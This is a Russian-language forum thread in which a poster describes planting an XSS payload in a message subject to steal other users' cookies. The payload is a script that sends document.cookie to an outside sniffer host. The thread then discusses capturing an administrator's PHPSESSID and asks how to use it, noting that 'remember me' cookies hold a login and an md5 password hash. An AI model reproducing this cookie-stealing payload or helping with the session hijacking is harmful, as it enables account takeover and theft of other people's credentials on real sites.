Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения) <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>
я конечно не знаток в хаке но со сниффером справиться могу и сообщение мои читали(так как на них отвечали))) Есть еще предложения?)) Вот еще зашел под другим пользователем посмотрел письмо с xss которое я отправил от другово своего пользователи, кукисы пришли, как будто на сниф только мои приходят
Сомневаюсь в подобном раскладе. Если они все таки заходят, то не может быть в принципе что твои приходят, а их нет.
наконецто поймал кукисы но тут возник другой вопрос, поймал PHPSESSID админа через инеткрэк послал пакет , посмотрел его страницу в инет креке, как я могу это использовать?в кукисах PHPSESSID не нахожу, они создаются тока когда ставишь галочку на "запомнить мнея" в виде login- xxxx pass-md5(xxx) а PHPSESSID нету...